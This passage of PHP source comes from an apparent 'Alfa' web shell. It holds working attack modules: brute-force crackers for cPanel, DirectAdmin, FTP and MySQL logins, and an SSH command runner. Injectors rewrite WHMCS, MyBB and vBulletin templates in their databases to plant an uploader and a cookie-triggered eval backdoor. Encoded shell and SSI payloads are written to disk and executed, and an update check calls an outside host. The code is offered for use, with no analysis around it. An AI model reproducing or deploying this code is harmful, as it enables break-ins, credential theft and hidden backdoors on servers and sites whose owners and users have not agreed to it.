2352 array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')
2353);
2354create_table($table);
2355echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
2356$username = ($_POST['alfa3']);
2357$password = ($_POST['alfa4']);
2358$dbname = ($_POST['alfa5']);
2359$dfile = ($_POST['alfa6']);
2360$host = ($_POST['alfa7']);
2361if(!empty($dbname)){
2362echo __pre();
2363$msg = "<center>Check this : <font color='red'>".$dfile."</font></center>";
2364if(@mysqli_connect($host,$username,$password,$dbname)){
2365if(strlen(alfaEx("mysqldump"))>0){
2366alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");
2367echo($msg);
2368}else{
2369__alert("Error...!");
2370}
2371}else{
2372echo('<center>mysqli_connect : Error!</center>');
2373}
2374}
2375echo('</div>');
2376alfafooter();
2377}
2378function Alfa_DirectAdmin_Cracker($info){
2379if(!$info['mysql'])
2380$url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
2381else $url = $info['protocol'].$info['target'].'/phpmyadmin';
2382$curl = curl_init();
2383curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
2384curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2385curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
2386curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
2387curl_setopt($curl, CURLOPT_HEADER,0);
2388curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2389curl_setopt($curl, CURLOPT_URL,$url);
2390curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
2391if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
2392$result = curl_exec($curl);
2393$curl_errno = curl_errno($curl);
2394$curl_error = curl_error($curl);
2395if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
2396elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){
2397echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2398$info['target'] = $url;
2399CrackerResualt($info);
2400}
2401curl_close($curl);
2402}
2403function Alfa_CP_Cracker($info){
2404$url = $info['protocol'].$info['target'].':'.$info['port'];
2405$curl = curl_init();
2406curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
2407curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2408curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
2409curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
2410curl_setopt($curl, CURLOPT_HEADER,0);
2411curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
2412curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
2413curl_setopt($curl, CURLOPT_URL, $url);
2414$result = curl_exec($curl);
2415$curl_errno = curl_errno($curl);
2416$curl_error = curl_error($curl);
2417if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
2418elseif(preg_match('/filemanager/i',$result)){
2419echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2420$info['target'] = $url;
2421CrackerResualt($info);
2422}
2423curl_close($curl);
2424}
2425function Alfa_FTP_Cracker($info){
2426$url = $info['protocol'].$info['target'];
2427$curl = curl_init();
2428curl_setopt($curl, CURLOPT_URL, $url);
2429curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2430curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2431curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
2432$result = curl_exec($curl);
2433$curl_errno = curl_errno($curl);
2434$curl_error = curl_error($curl);
2435if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
2436elseif(preg_match('/(\d+):(\d+)/i',$result)){
2437echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2438$info['target'] = $url;
2439CrackerResualt($info);
2440}
2441curl_close($curl);
2442}
2443function Alfa_Mysql_Cracker($info){
2444if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){
2445CrackerResualt($info);
2446echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2447}
2448}
2449function Alfa_FTPC($info){
2450if($con=@ftp_connect($info['target'],$info['port'])){
2451if($con){
2452$login=@ftp_login($con,$info['username'],$info['password']);
2453if($login){CrackerResualt($info);}}}
2454@ftp_close($con);
2455}
2456function CrackerResualt($info){
2457$res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
2458$c = @fopen($info['fcrack'],'a+');
2459@fwrite($c, $res);
2460@fclose($c);
2461}
2462function Alfa_Call_Function_Cracker($method,$info){
2463switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}
2464}
2465function alfaCrackers(){
2466alfahead();
2467AlfaNum(9,10);
2468echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">';
2469foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin[DirectAdmin]','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');
2470echo '</select> Protocol: <select id="protocol" name="protocol">';
2471foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');
2472echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
2473Port: <input id="port" type="text" name="port" value="2083">
2474<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
2475<textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>
2476  <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
2477Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
2478<p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
2479$target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);
2480$port = $_POST['alfa2'];
2481$usernames= $_POST['alfa3'];
2482$passwords = $_POST['alfa4'];
2483$fcrack = $_POST['alfa5'];
2484$cracking = $_POST['alfa6'];
2485$protocol = $_POST['alfa7'];
2486$loginpanel = $_POST['alfa8'];
2487$p = $loginpanel == 'phpmyadmin' ? $p = true : false;
2488if($cracking=='start'){
2489echo __pre();
2490$exuser = explode("\n",$usernames);
2491$expw = explode("\n",$passwords);
2492foreach($exuser as $user){
2493foreach($expw as $pw){
2494$array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
2495Alfa_Call_Function_Cracker($loginpanel,$array);
2496}
2497}
2498echo '<br><font color="red">Attack Finished...</font>';
2499}
2500echo '</div>';
2501alfafooter();
2502}
2503function alfassh2(){
2504if(function_exists('ssh2_connect')){
2505$_SESSION['connected']= false;
2506$ssh_ip = $_POST['alfa1'];
2507$ssh_login = $_POST['alfa2'];
2508$ssh_pass = $_POST['alfa3'];
2509$ssh_port = $_POST['alfa4'];
2510$ssh_command = $_POST['alfa5'];
2511if($alfaconnect2ssh=@ssh2_connect($ssh_ip, $ssh_port))
2512{
2513if($alfalogin=@ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass))
2514{
2515$_SESSION['connected']= true;
2516}
2517}
2518if($_SESSION['connected']!== true){
2519alfahead();
2520echo "<div class=header>";
2521echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,this.ssh_ip.value,this.ssh_login.value,this.ssh_pass.value,this.ssh_port.value); return false;'><table cellpadding='2' cellspacing='0'><tr><td><font color=\"#ffffff\"><b>IP</b></font></td><td><font color=\"#ffffff\"><b>SSH USER</b></font></td><td><font color=\"#ffffff\"><b>SSH PASS</b></font></td><td><font color=\"#ffffff\"><b>SSH PORT</b></font></td><td></td></tr><tr><td><input type=text name=ssh_ip value=''></td><td><input type=text name=ssh_login value=''></td><td><input type=text name=ssh_pass value=''></td><td><input type=text name=ssh_port value=''></td><td><input type='submit' name='submit' value=' '></td></table></form></div>";
2522alfafooter();
2523}
2524if($_SESSION['connected']==true){
2525alfahead();
2526echo "<div class=header>";
2527echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,\"".$ssh_ip."\",\"".$ssh_login."\",\"".$ssh_pass."\",\"".$ssh_port."\",this.ssh_command.value,\">>\"); return false;'><table cellpadding='2' cellspacing='0'><tr><td><input type=text name=ssh_command value=''></td><td><input type='submit' name='execute' value=' '></td></table></form><form name='ssh2' method='post' onsubmit='g(\'ssh2\',null,\'\',\'\',\'\'); return false;'><input type=submit name='destsession' value='logout'></form>";
2528$alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command);
2529stream_set_blocking($alfastream,true);
2530$output = ssh2_fetch_stream($alfastream,SSH2_STREAM_STDIO);
2531if($_POST['alfa6']=='>>'){
2532echo '<pre class=ml1>';
2533ob_start();
2534echo stream_get_contents($output);
2535echo htmlspecialchars(ob_get_clean());
2536}
2537echo "</div>";
2538alfafooter();
2539}}else{
2540alfahead();
2541echo '<div class=header><p><center><b><font color="red">Server does not support SSH2</font><p></b></center></div>';
2542alfafooter();
2543}
2544}
2545function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";}
2546function alfaShellInjectors(){
2547alfahead();
2548echo '<div class=header>';
2549AlfaNum(11);
2550echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
2551$selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
2552if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){
2553AlfaNum();
2554echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
2555$table = array('td1' =>
2556 array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
2557 'td2' =>
2558 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
2559 'td3' =>
2560 array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
2561 'td4' =>
2562 array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
2563 'td5' =>
2564 array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
2565);
2566create_table($table);
2567echo $selector;
2568echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
2569if(isset($_POST['alfa6'])) {
2570$dbu = $_POST['alfa6'];
2571$dbn = $_POST['alfa7'];
2572$dbp = $_POST['alfa8'];
2573$dbh = $_POST['alfa9'];
2574$path = $_POST['alfa10'];
2575$method = $_POST['alfa4'];
2576$index = "{php}".ALFA_UPLOADER.";{/php}";
2577$newin = str_replace("'","\'",$index);
2578$newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
2579if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
2580if(filter_var($path,FILTER_VALIDATE_URL)){
2581$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
2582$soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
2583$soleGet = mysqli_fetch_assoc($soleSave);
2584$tempSave1 = $soleGet['message'];
2585$tempSave = str_replace("'","\'",$tempSave1);
2586$inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
2587$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
2588$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
2589$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
2590if(function_exists('curl_version') && $method == 'auto'){
2591$AlfaSole = new AlfaCURL(true);
2592$saveurl = $AlfaSole->Send($path."/pwreset.php");
2593$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
2594$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
2595$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
2596$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
2597__alert("shell injectet...");
2598$ff= 'http://'.$path."/solevisible.php";
2599output($ff);}else{
2600echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert('Path is not Valid...');}}}
2601}if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){
2602AlfaNum(1,2,3,5);
2603echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>
2604";
2605$table = array('td1' =>
2606 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
2607 'td2' =>
2608 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),
2609 'td3' =>
2610 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),
2611 'td4' =>
2612 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),
2613 'td5' =>
2614 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')
2615);
2616create_table($table);
2617echo $selector;
2618echo "<p><input type=submit value=' '></p></form></center></center>";
2619if(isset($_POST['alfa6'])) {
2620$dbu = $_POST['alfa6'];
2621$dbn = $_POST['alfa7'];
2622$dbp = $_POST['alfa8'];
2623$dbh = $_POST['alfa9'];
2624$prefix = $_POST['alfa10'];
2625$method = $_POST['alfa4'];
2626$shellCode = "{\${".ALFA_UPLOADER."}}";
2627$newinshell = str_replace("'","\'",$shellCode);
2628if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){
2629$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
2630$inject = "select template from {$prefix}templates where title= 'calendar'";
2631$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
2632$GetTemp = mysqli_fetch_assoc($result);
2633$saveDate = $GetTemp['template'];
2634$repsave = str_replace($shellCode,"",$saveDate);
2635$repsave = str_replace("'","\'",$repsave);
2636$createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
2637$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
2638$geturl = "select value from {$prefix}settings where name= 'bburl'";
2639$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
2640$rowb = mysqli_fetch_assoc($findurl);
2641$furl = $rowb['value'];
2642$realurl = parse_url($furl,PHP_URL_HOST);
2643$realpath = parse_url($furl,PHP_URL_PATH);
2644$res = false;
2645$AlfaCurl = new AlfaCURL();
2646if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){
2647if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
2648@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
2649@fputs($fsock, "HOST: $realurl\r\n");
2650@fputs($fsock, "Connection: close\r\n\r\n");
2651$check = fgets($fsock);
2652if(preg_match("/200 OK/i",$check)){
2653$repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
2654$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}
2655@fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){
2656$AlfaCurl->Send($realurl.$realpath."/calendar.php");
2657$res = true;
2658}
2659if($res){
2660$ff = 'http://'.$realurl.$realpath."/solevisible.php";
2661output($ff);
2662}else{
2663$ff = 'http://'.$realurl.$realpath."/calendar.php";
2664$fff = 'http://'.$realurl.$realpath."/solevisible.php";
2665echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
2666}}}}
2667if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){
2668AlfaNum(1,2,7,9,10);
2669echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
2670$table = array('td1' =>
2671 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
2672 'td2' =>
2673 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),
2674 'td3' =>
2675 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),
2676 'td4' =>
2677 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),
2678 'td5' =>
2679 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')
2680);
2681create_table($table);
2682echo $selector;
2683echo '<p><input type="submit" value=" " /></p></form></center>';
2684if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){
2685$method = $_POST['alfa8'];
2686$code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
2687$conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_error($conn));
2688$rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='faq'";
2689$recivedata = @mysqli_query($conn,$rec);
2690$getd = @mysqli_fetch_assoc($recivedata);
2691$savetoass = $getd['template'];
2692$code = str_replace("'","\'",$code);
2693$p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='faq'";
2694$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
2695$geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
2696$getval = @mysqli_fetch_assoc($geturl);
2697$saveval = $getval['value'];
2698$realurl = parse_url($saveval,PHP_URL_HOST);
2699$realpath = parse_url($saveval,PHP_URL_PATH);
2700$res = false;
2701$AlfaCurl = new AlfaCURL();
2702if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){
2703if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
2704@fputs($fsock, "GET $realpath/faq.php HTTP/1.1\r\n");
2705@fputs($fsock, "HOST: $realurl\r\n");
2706@fputs($fsock, "Connection: close\r\n\r\n");
2707$check = fgets($fsock);
2708if(preg_match("/200 OK/i",$check)){
2709$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
2710$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
2711$res = true;
2712}
2713@fclose($fsock);
2714}
2715}elseif(function_exists('curl_version') && $method == 'auto'){
2716$AlfaCurl->Send($realurl.$realpath."/faq.php");
2717$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
2718$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
2719$res = true;
2720}
2721if($res){
2722$ff = 'http://'.$realurl.$realpath."/solevisible.php";
2723output($ff);
2724}else{
2725$ff = 'http://'.$realurl.$realpath."/faq.php";
2726$fff = 'http://'.$realurl.$realpath."/solevisible.php";
2727echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";}}}
2728echo '</div>';
2729alfafooter();
2730}
2731function alfaupdatepath(){
2732 if($_POST['path']!=''){
2733 $_SESSION[__LAST_CWD__] = $_POST['path'];
2734 }
2735 echo($_SESSION[__LAST_CWD__]);
2736}
2737function alfacheckfiletype(){
2738 $path = $_POST['path'];
2739 $arg = $_POST['arg'];
2740 if(@is_file($path.'/'.$arg)){
2741 echo("file");
2742 }else{
2743 echo("dir");
2744 }
2745}
2746function alfacheckupdate(){
2747 if(!isset($_COOKIE['alfa_checkupdate'])){
2748 if(function_exists("curl_version")){
2749 $update = new AlfaCURL();
2750 $json = $update->Send("http://solevisible.com/update.json");
2751 $json = @json_decode($json);
2752 if($json){
2753 if(__ALFA_VERSION__ != $json->version){
2754 @setcookie("alfa_checkupdate", "1", time()+86400);
2755 echo('<div class="update-holder"><div class="update-partner"><div class="update-content"><div onClick="document.getElementsByClassName(\'update-holder\')[0].style.display = \'none\';" class="update-close">X</div><a href="'.$json->url.'" target="_blank">'.$json->text.'<br> Version: '.$json->version.'</a></div></div></div>');
2756 }
2757 }
2758 }
2759 }
2760}
2761function alfaWriteTocgiapi($name, $source){
2762 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
2763 @mkdir('alfacgiapi',0755);
2764 __write_file("alfacgiapi/".$name, __get_resource($source));
2765 @chmod("alfacgiapi/".$name, 0755);
2766}
2767function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}
2768function alfaupdateheader(){
2769 if(!isset($_SESSION["updateheader_data"])){
2770 $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
2771 $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
2772 alfaWriteTocgiapi("getheader.alfa",$bash);
2773 $data = alfaEx("cd '{$realdir}/alfacgiapi';sh getheader.alfa",false,true,true);
2774 if(@is_array(@json_decode($data,true))){
2775 $_SESSION["updateheader_data"] = $data;
2776 echo $data;
2777 }
2778 }else{
2779 echo $_SESSION["updateheader_data"];
2780 }
2781}
2782function alfassiShell(){
2783alfahead();
2784echo '<div class=header>';
2785@mkdir('alfa_shtml',0755);
2786@chdir('alfa_shtml');
2787alfacgihtaccess('shtml');
2788$code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
2789@__write_file('alfa_ssi.shtml',__get_resource($code));
2790@chmod("alfa_ssi.shtml",0755);
2791echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
2792echo '</div>';
2793alfafooter();
2794}
